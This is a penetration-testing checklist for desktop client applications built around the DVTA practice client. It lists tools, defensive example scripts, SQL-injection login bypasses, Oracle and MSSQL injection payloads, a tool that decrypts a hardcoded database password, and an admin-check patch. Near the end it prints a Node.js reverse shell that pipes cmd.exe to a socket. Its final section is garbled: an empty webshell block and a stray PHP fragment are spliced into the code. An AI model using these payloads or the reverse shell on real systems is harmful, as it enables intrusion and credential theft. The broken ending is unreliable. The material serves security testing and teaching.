0x00 Introduction
In recent years, the interaction between users and PC clients has become increasingly important. This trend is driven by the need for enhanced user
This project primarily targets penetration testing for PC clients (CS architecture). It combines personal testing experience with online resources to form a checklist. If you have any questions, please get in touch. We look forward to more contributions in techniques and case studies from everyone.
0x01 Overview
A PC client is a desktop application with a rich-featured graphical user interface, built on a client/server (CS) architecture.
0x02 Development Languages
C# (.NET), JAVA, DELPHI, C, C++ ……
0x03 Protocols
TCP, HTTP(S), TDS ……
0x04 Databases
Oracle, MSSQL, DB2 ……
0x05 Testing Tools
// Related tool downloads: https://github.com/theLSA/hack-cs-tools
dvta: a PC client practice range
ida pro: static analysis tool
ollydbg: dynamic analysis tool
CFF Explorer: PE file analysis
PEiD: packer detection ("shell checking")
Exeinfo PE / StudPE: PE file analysis
wireshark: observe traffic
tcpview: observe TCP traffic
Echo Mirage: intercept TCP traffic
burpsuite: HTTP(S) packet capture
proxifier: global proxy traffic
procmon: files and registry monitoring
regshot: registry change comparison
Process Hacker: process analysis
RegFromApp: registry monitoring
WSExplorer: capture the network packets of a specific process
strings: view program strings
.NET [de]compilation:
dotpeek
de4dot
dnspy
ilspy
sae
ildasm
ilasm
Java decompilation
jad
jd-gui
jadx
dex2jar
Online versions: javare.cn, www.javadecompilers.com
Reflexil: assembly editor (can be used as an ilspy plugin)
Vcg: automated code audit tool
BinScope: binary analysis tool
0x06 Proxy Settings
Most clients have no proxy configuration of their own, so a global proxy has to be set up manually. Two methods:
1) IE – Internet Options – Connections – LAN Settings.
2) A global proxy tool such as Proxifier: configure the proxy server and the proxification rules.
// HTTP traffic can be conveniently tested with BurpSuite (set proxy server to Burp proxy address).
0x07 Testing Points
0. Information Gathering
Compilation information, development environment/language, protocols used, database, IP addresses, obfuscation/encryption, packing, etc.
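Much of this can be read straight from the PE headers before any tool is opened. The following is an added example, not code from the page or from DVTA: it parses the DOS, COFF, optional and section headers to report the target architecture, linker version, subsystem, the exploit-mitigation flags (DEP/ASLR/CFG), whether a CLR header is present (a .NET client) and a per-section entropy heuristic for packing. The sample image is constructed in build_sample_pe() and contains headers only; feed triage_pe() the bytes of a real client to use it.

```python
# Added example: static triage of a PE client's headers (compiler hints, .NET
# detection, exploit mitigations, packing heuristic). The sample image is
# constructed in build_sample_pe(); it is not a real executable.
import math
import struct
from collections import Counter

CLR_DIRECTORY_INDEX = 14           # IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR: non-zero => .NET assembly
MACHINE_NAMES = {0x14C: "x86", 0x8664: "x64"}
SUBSYSTEMS = {2: "Windows GUI", 3: "Windows console"}
DLL_CHARACTERISTICS = {            # IMAGE_DLLCHARACTERISTICS_* flags relevant to exploit mitigation
    0x0020: "high-entropy 64-bit ASLR",
    0x0040: "ASLR (DYNAMIC_BASE)",
    0x0100: "DEP (NX_COMPAT)",
    0x0400: "NO_SEH",
    0x4000: "CFG (GUARD_CF)",
}
PACKED_ENTROPY_THRESHOLD = 7.0     # bits/byte; compressed or encrypted sections sit close to 8


def entropy(data: bytes) -> float:
    """Shannon entropy of a byte string in bits per byte."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def triage_pe(blob: bytes) -> dict:
    """Walk DOS -> COFF -> optional -> section headers and collect triage facts."""
    if blob[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    if blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    machine, nsections, timestamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", blob, coff)
    opt = coff + 20
    magic, linker_major, linker_minor = struct.unpack_from("<HBB", blob, opt)
    if magic == 0x10B:
        fmt, dd_offset = "PE32", opt + 96
    elif magic == 0x20B:
        fmt, dd_offset = "PE32+", opt + 112
    else:
        raise ValueError("unknown optional header magic %#x" % magic)
    # Subsystem and DllCharacteristics share the same offset in PE32 and PE32+
    subsystem, dllchars = struct.unpack_from("<HH", blob, opt + 68)
    clr_rva, clr_size = struct.unpack_from("<II", blob, dd_offset + 8 * CLR_DIRECTORY_INDEX)

    sections = []
    for i in range(nsections):
        name, _, _, raw_size, raw_ptr = struct.unpack_from("<8sIIII", blob, opt + opt_size + 40 * i)
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "entropy": round(entropy(blob[raw_ptr:raw_ptr + raw_size]), 2),
        })

    return {
        "format": fmt,
        "machine": MACHINE_NAMES.get(machine, hex(machine)),
        "timestamp": timestamp,                      # build time; zero or odd values hint at an edited header
        "linker_version": f"{linker_major}.{linker_minor}",
        "subsystem": SUBSYSTEMS.get(subsystem, str(subsystem)),
        "mitigations": [n for bit, n in DLL_CHARACTERISTICS.items() if dllchars & bit],
        "is_dotnet": clr_rva != 0 and clr_size != 0,
        "sections": sections,
        "possibly_packed": any(s["entropy"] > PACKED_ENTROPY_THRESHOLD for s in sections),
    }


def build_sample_pe(dotnet: bool, high_entropy: bool, dllchars: int = 0x8140) -> bytes:
    """Constructed minimal PE32 image with one .text section (headers only, no real code)."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)                 # e_lfanew = 0x40
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 1, 0x5F000000, 0, 0, 224, 0x0102)
    std = struct.pack("<HBBIIIIII", 0x10B, 14, 0, 0x200, 0, 0, 0x1000, 0x1000, 0x2000)
    win = struct.pack("<IIIHHHHHHIIIIHHIIIIII", 0x400000, 0x1000, 0x200, 6, 0, 0, 0, 6, 0,
                      0, 0x3000, 0x200, 0, 2, dllchars, 0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    dirs = bytearray(16 * 8)
    if dotnet:
        struct.pack_into("<II", dirs, 8 * CLR_DIRECTORY_INDEX, 0x2000, 72)   # CLR header present
    section = struct.pack("<8sIIIIIIHHI", b".text", 0x200, 0x1000, 0x200, 0x200, 0, 0, 0, 0, 0x60000020)
    headers = dos + coff + std + win + bytes(dirs) + section
    body = bytes(range(256)) * 2 if high_entropy else b"\x90" * 400 + b"\x00" * 112
    return headers.ljust(0x200, b"\0") + body


if __name__ == "__main__":
    for flags in ((True, False), (False, True)):
        print(triage_pe(build_sample_pe(*flags)))
```

The entropy threshold is a heuristic: a high-entropy .text section suggests a packer or obfuscator and tells you PEiD/Exeinfo PE are the next stop; a present CLR directory tells you to reach for dnSpy or ILSpy rather than IDA.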
Case 0 – CFF viewing client information (e.g., compilation environment)
dvta
1. Reverse Engineering
Decompilation, source code leakage, hardcoded keys/passwords, encryption/decryption logic, role determination logic (0-admin, 1-normal user), backdoors, etc.
Case 0 – Decompile to obtain encryption and decryption logic and develop decryption tool
dvta
Using this logic and the information obtained:
Encrypted text: CTsvjZ0jQghXYWbSRcPxpQ==
AES Key: J8gLXc454o5tW2HEF7HahcXPufj9v8k8
IV: fq20T0gMnXa6g0l4
Develop a decryption tool:
```csharp
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Windows.Forms;
using System.Security.Cryptography;

namespace aesdecrypt
{
    public partial class aesdecrypt : Form
    {
        public aesdecrypt()
        {
            InitializeComponent();
        }

        // Button handler: decrypts the value recovered from the decompiled client
        private void decrypt(object sender, EventArgs e)
        {
            String key = "J8gLXc454o5tW2HEF7HahcXPufj9v8k8";   // AES key hardcoded in the client
            String IV = "fq20T0gMnXa6g0l4";                    // IV hardcoded in the client
            String encryptedtext = "CTsvjZ0jQghXYWbSRcPxpQ==";
            byte[] encryptedBytes = Convert.FromBase64String(encryptedtext);
            AesCryptoServiceProvider aes = new AesCryptoServiceProvider();
            aes.BlockSize = 128;
            aes.KeySize = 256;
            aes.Key = System.Text.ASCIIEncoding.ASCII.GetBytes(key);
            aes.IV = System.Text.ASCIIEncoding.ASCII.GetBytes(IV);
            aes.Padding = PaddingMode.PKCS7;
            aes.Mode = CipherMode.CBC;
            ICryptoTransform crypto = aes.CreateDecryptor(aes.Key, aes.IV);
            byte[] decryptedbytes = crypto.TransformFinalBlock(encryptedBytes, 0, encryptedBytes.Length);
            String decryptedString = System.Text.ASCIIEncoding.ASCII.GetString(decryptedbytes);
            Console.WriteLine("\n");
            Console.WriteLine("##########Decrypting Database password##########\n");
            Console.WriteLine("Decrypted Database password:" + decryptedString + "\n");
            Console.WriteLine("##########Done##########\n");
        }
    }
}
```
Case 1 – Decompile and patch the code logic so that a normal user logs in as administrator
dvta
isadmin == 1: administrator
isadmin == 0: normal user
Patch the comparison value from 1 to 0 so that a normal user is treated as admin.
2. Information Disclosure
Plain text sensitive information, sensitive files (e.g., xxx.config in installation directory).
Registry: use regshot to compare the registry before and after a client action (e.g., logging in).
Development debugging logs (e.g., dvta.exe >> log.txt)
Process Hacker: view plaintext sensitive data in client memory (e.g., account passwords/keys).
strings: directly view client strings (e.g., IP information).
View source code (e.g., on GitHub, Gitee, etc.)
Case 0 – Configuration sensitive information disclosure
dvta
Case 1 – Memory leakage of database account password
dvta
Case 2 – Source code containing hardcoded FTP account password
dvta
Case 3 – Development debugging log disclosure
dvta
Case 4 – Some systems save account passwords locally after login
//Example source from https://blog.csdn.net/weixin_30685047/article/details/95916065
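The Process Hacker and strings steps above come down to one thing: sweeping a memory dump or binary for printable runs and spotting the sensitive ones. The following is an added example, not code from the page or from DVTA. It extracts both ASCII and UTF-16LE strings (the .NET runtime stores strings as UTF-16, so an ASCII-only strings run misses them) and flags connection-string passwords, embedded FTP credentials, IP addresses and long base64-like tokens. SAMPLE_DUMP is constructed; the 32-character token in it is the AES key quoted in the Reverse Engineering case, and the other values are made up.

```python
# Added example: a strings-style sweep over a memory dump or binary that flags
# sensitive-looking values. .NET keeps strings as UTF-16LE, so both encodings
# are extracted. SAMPLE_DUMP is constructed, not a real process dump.
import re

MIN_LEN = 6
ASCII_RE = re.compile(rb"[\x20-\x7e]{%d,}" % MIN_LEN)
UTF16_RE = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % MIN_LEN)

# Heuristics for the disclosures listed above: connection strings, FTP creds, IPs, keys
SENSITIVE = {
    "connection string password": re.compile(r"(?i)(?:password|pwd)\s*=\s*[^;\s]+"),
    "ftp credentials": re.compile(r"(?i)ftp://[^\s/:@]+:[^\s/@]+@"),
    "ipv4 address": re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b"),
    "long base64-like token": re.compile(r"(?<![A-Za-z0-9+/])[A-Za-z0-9+/]{32,}={0,2}"),
}


def extract_strings(blob: bytes):
    """Return (offset, text) for every ASCII or UTF-16LE printable run of MIN_LEN+ characters."""
    found = [(m.start(), m.group().decode("ascii")) for m in ASCII_RE.finditer(blob)]
    found += [(m.start(), m.group().decode("utf-16-le")) for m in UTF16_RE.finditer(blob)]
    return sorted(found)


def find_sensitive(blob: bytes):
    """Return (offset, label, text) for every extracted string matching a SENSITIVE rule."""
    hits = []
    for offset, text in extract_strings(blob):
        for label, rx in SENSITIVE.items():
            if rx.search(text):
                hits.append((offset, label, text))
    return hits


SAMPLE_DUMP = (                                     # constructed, not a real process dump
    b"\x00\x01\x02MZ\x90\x00"
    + b"Server=10.0.0.5;Database=DVTA;User Id=sa;Password=Tr0ub4dor;" + b"\x00" * 8
    + "ftp://ftpuser:ftppass@192.168.1.20/".encode("utf-16-le") + b"\x00\x00"
    + b"\x7fELF" + b"\xff" * 10
    + b"J8gLXc454o5tW2HEF7HahcXPufj9v8k8" + b"\x00"
    + b"short" + b"\x00"
)

if __name__ == "__main__":
    for offset, label, text in find_sensitive(SAMPLE_DUMP):
        print(f"0x{offset:06x}  {label:28s}  {text}")
```

Run it over a dump written from Process Hacker (or over the installed binary and its config files) and every hit is a finding to report: a credential that should live server-side, a key that should be in the OS credential store, or an internal address that should not ship to users.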
3. Transmission Traffic
Wireshark / Echo Mirage / Burp Suite + NoPE Proxy / Fiddler / Charles
FTP and similar protocols transmit account passwords in plaintext.
SQL statements transmitted in plaintext (the statement can be modified in transit, e.g., for injection or privilege escalation).
Case 0 – SQL statements of a certain educational administration system are transmitted in plaintext, returning plaintext data
//Example source from wooyun
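What Wireshark shows for the two findings above (plaintext FTP logins, raw SQL on the wire) can be checked automatically. The following is an added example, not code from the page or from any of the tools listed: a small libpcap parser (Ethernet/IPv4/TCP only) that runs a few plaintext-credential and SQL rules over every TCP payload and reports the flow each match was seen on. The capture is constructed in build_sample_capture(); addresses, ports and credentials are made up, and the last frame is an unreadable TLS record to show that encrypted traffic produces no finding.

```python
# Added example: offline parse of a pcap (Ethernet/IPv4/TCP only) that flags
# plaintext FTP credentials, SQL statements and HTTP credentials on the wire.
# The capture is constructed in build_sample_capture(); nothing in it is real.
import re
import socket
import struct

RULES = {
    "plaintext FTP credential": re.compile(rb"^(USER|PASS) \S+", re.M),
    "SQL statement on the wire": re.compile(
        rb"\b(SELECT|INSERT|UPDATE|DELETE)\b.*\b(FROM|INTO|SET|WHERE)\b", re.I),
    "HTTP basic/form credential": re.compile(rb"(?i)(Authorization: Basic |password=)"),
}


def parse_frame(frame: bytes):
    """Return src/dst/ports/payload for an Ethernet/IPv4/TCP frame, else None."""
    if len(frame) < 34 or frame[12:14] != b"\x08\x00":
        return None
    ihl = (frame[14] & 0x0F) * 4
    total_len = struct.unpack_from("!H", frame, 16)[0]
    if frame[23] != 6:                          # IP protocol field: 6 = TCP
        return None
    src, dst = socket.inet_ntoa(frame[26:30]), socket.inet_ntoa(frame[30:34])
    tcp = 14 + ihl
    sport, dport = struct.unpack_from("!HH", frame, tcp)
    data_off = (frame[tcp + 12] >> 4) * 4
    return {"src": src, "sport": sport, "dst": dst, "dport": dport,
            "payload": frame[tcp + data_off:14 + total_len]}


def parse_pcap(data: bytes):
    """Yield parsed TCP packets from a classic libpcap file (either byte order)."""
    magic = struct.unpack_from("<I", data, 0)[0]
    order = {0xA1B2C3D4: "<", 0xD4C3B2A1: ">"}.get(magic)
    if order is None:
        raise ValueError("not a libpcap file")
    linktype = struct.unpack_from(order + "IHHiIII", data, 0)[6]
    if linktype != 1:
        raise ValueError("only LINKTYPE_ETHERNET is handled here")
    off = 24
    while off + 16 <= len(data):
        _, _, incl_len, _ = struct.unpack_from(order + "IIII", data, off)
        off += 16
        pkt = parse_frame(data[off:off + incl_len])
        off += incl_len
        if pkt:
            yield pkt


def audit_capture(pcap: bytes):
    """Run every RULE over every TCP payload; return one finding per match."""
    findings = []
    for pkt in parse_pcap(pcap):
        for issue, rx in RULES.items():
            m = rx.search(pkt["payload"])
            if m:
                findings.append({
                    "flow": f"{pkt['src']}:{pkt['sport']} -> {pkt['dst']}:{pkt['dport']}",
                    "issue": issue,
                    "evidence": m.group().decode("latin-1")[:60],
                })
    return findings


def build_frame(src, dst, sport, dport, payload: bytes) -> bytes:
    """Constructed Ethernet/IPv4/TCP frame; checksums are left zero (fine for offline parsing)."""
    eth = b"\x00" * 12 + b"\x08\x00"
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40 + len(payload), 0, 0, 64, 6, 0,
                     socket.inet_aton(src), socket.inet_aton(dst))
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 0x50, 0x18, 65535, 0, 0)
    return eth + ip + tcp + payload


def build_sample_capture() -> bytes:
    """Constructed pcap: an FTP login, a raw SQL query to a database port and a TLS record."""
    frames = [
        build_frame("192.168.56.10", "192.168.56.20", 49152, 21, b"USER ftpuser\r\n"),
        build_frame("192.168.56.10", "192.168.56.20", 49152, 21, b"PASS ftppass123\r\n"),
        build_frame("192.168.56.10", "192.168.56.30", 49153, 1433,
                    b"SELECT * FROM users WHERE username='admin'"),
        build_frame("192.168.56.10", "192.168.56.40", 49154, 443,
                    b"\x16\x03\x01\x00\xa5\x01\x00\x00\xa1"),   # TLS record: nothing readable
    ]
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    for i, f in enumerate(frames):
        out += struct.pack("<IIII", 1700000000 + i, 0, len(f), len(f)) + f
    return out


if __name__ == "__main__":
    for finding in audit_capture(build_sample_capture()):
        print(finding)
```

Each finding maps to a fix on the client side: FTP credentials on the wire call for SFTP/FTPS, and SQL on the wire means the client talks to the database directly, so the fix is an application server that owns the query (and the role check) rather than just TLS on the database port.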
4. Other Vulnerabilities
Brute Force
Such as login functionality.
Username Enumeration
Case 0
SQL Statement Exposure
Case 0
SQL Injection
Such as login locations, universal password:
xxx' or 'x'='x
xxx' or 1=1--
In input fields, construct a closure error with inputs such as ' , ') , %') , order by 100-- and so on.
Extract data through displayed columns or error messages; the principle is the same as web injection and is similar across databases.
Case 0 – oracle injection
```sql
'union select null,null,(select user from dual),null,null,(select banner from sys.v_$version where rownum=1),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null from dual--
```
Case 1 – MSSQL injection
```sql
111') and (select user)>0--
```
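Both cases work for the same reason: the client builds the SQL statement by pasting user input into a string. The following is an added example, not code from the page or from DVTA, that puts the string-built login query beside its parameterised form and runs the universal-password payloads above against each. It uses an in-memory SQLite table constructed here; the quoting behaviour being demonstrated is the same in MSSQL and Oracle.

```python
# Added example (not DVTA's code): the client-side query pattern that makes the
# universal-password payloads work, beside the parameterised form that defeats
# them. The users table is constructed in memory.
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed users table with one admin and one normal user."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password TEXT, isadmin INTEGER)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)",
                    [("admin", "S3cret!", 1), ("bob", "bobpass", 0)])
    return con


def login_vulnerable(con, username: str, password: str):
    """String-built query: user input becomes SQL syntax. Do not use."""
    sql = ("SELECT username, isadmin FROM users "
           "WHERE username='%s' AND password='%s'" % (username, password))
    return con.execute(sql).fetchone()


def login_safe(con, username: str, password: str):
    """Parameterised query: input is bound as data, so quotes and -- are inert."""
    sql = "SELECT username, isadmin FROM users WHERE username=? AND password=?"
    return con.execute(sql, (username, password)).fetchone()


if __name__ == "__main__":
    con = make_db()
    for user, pw in [("xxx' or 'x'='x", "xxx' or 'x'='x"), ("xxx' or 1=1--", "anything")]:
        print("vulnerable:", login_vulnerable(con, user, pw), " safe:", login_safe(con, user, pw))
```

Parameterising the query closes the injection, but note that the client is still the one issuing it; combined with the role-check case in the Reverse Engineering section, the real fix is to move authentication and the isadmin decision behind an application server.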
CSV Injection
For instance, when exporting Excel, input 1+1 and check for 2 after exporting.
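The export side of this check is where the fix lives: any cell whose first character can start a spreadsheet formula must be neutralised before it is written. The following is an added example, not code from the page: it quotes such cells (while leaving signed numbers intact), lists the cells that would otherwise have been interpreted, and reads the export back so you can confirm what a consumer's spreadsheet would see. Sample rows are constructed.

```python
# Added example (not from the page): neutralising formula-triggering cells when a
# client exports CSV, plus an audit of which cells would have been interpreted.
import csv
import io

FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def neutralize(cell: str) -> str:
    """Prefix formula-looking cells with a quote so spreadsheet apps treat them as text."""
    if not cell or cell[0] not in FORMULA_TRIGGERS:
        return cell
    if cell[0] in "+-":
        try:                      # keep signed numbers such as -12.5 intact
            float(cell)
            return cell
        except ValueError:
            pass
    return "'" + cell


def audit_rows(rows):
    """Return (row, col, value) for every cell that would be read as a formula."""
    return [(r, c, str(v)) for r, row in enumerate(rows)
            for c, v in enumerate(row) if neutralize(str(v)) != str(v)]


def export_csv(rows) -> str:
    """Write rows with every cell quoted and neutralised."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    for row in rows:
        writer.writerow([neutralize(str(v)) for v in row])
    return buf.getvalue()


def read_csv(text: str):
    """Parse CSV text back into rows (what a consumer's spreadsheet would import)."""
    return list(csv.reader(io.StringIO(text)))


SAMPLE_ROWS = [                                    # constructed export data
    ["name", "note", "balance"],
    ["alice", "=1+1", -12.5],
    ["bob", "@SUM(A1:A9)", "30"],
]

if __name__ == "__main__":
    print(audit_rows(SAMPLE_ROWS))
    print(export_csv(SAMPLE_ROWS))
```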
Weak Password
Try combinations like admin 123456 etc.
XSS
For example, Electron, NodeWebKit, etc.
Case 0 – Chinese Ant Sword XSS to RCE
Environment: Win7 + PHPStudy (PHP5.6.27-nts) + Perl + NC + AntSword2.0.5
XSS Webshell:
```javascript
```
WIN + Node.js:
Success
```javascript
var net = require("net"),
    sh = require("child_process").exec("cmd.exe");
var client = new net.Socket();
client.connect(6677, "127.0.0.1", function () {
    client.pipe(sh.stdin);
    sh.stdout.pipe(client);
    sh.stderr.pipe(client);
});
?><?php
header("HTTP/1.1 500 Not Relevant reference
```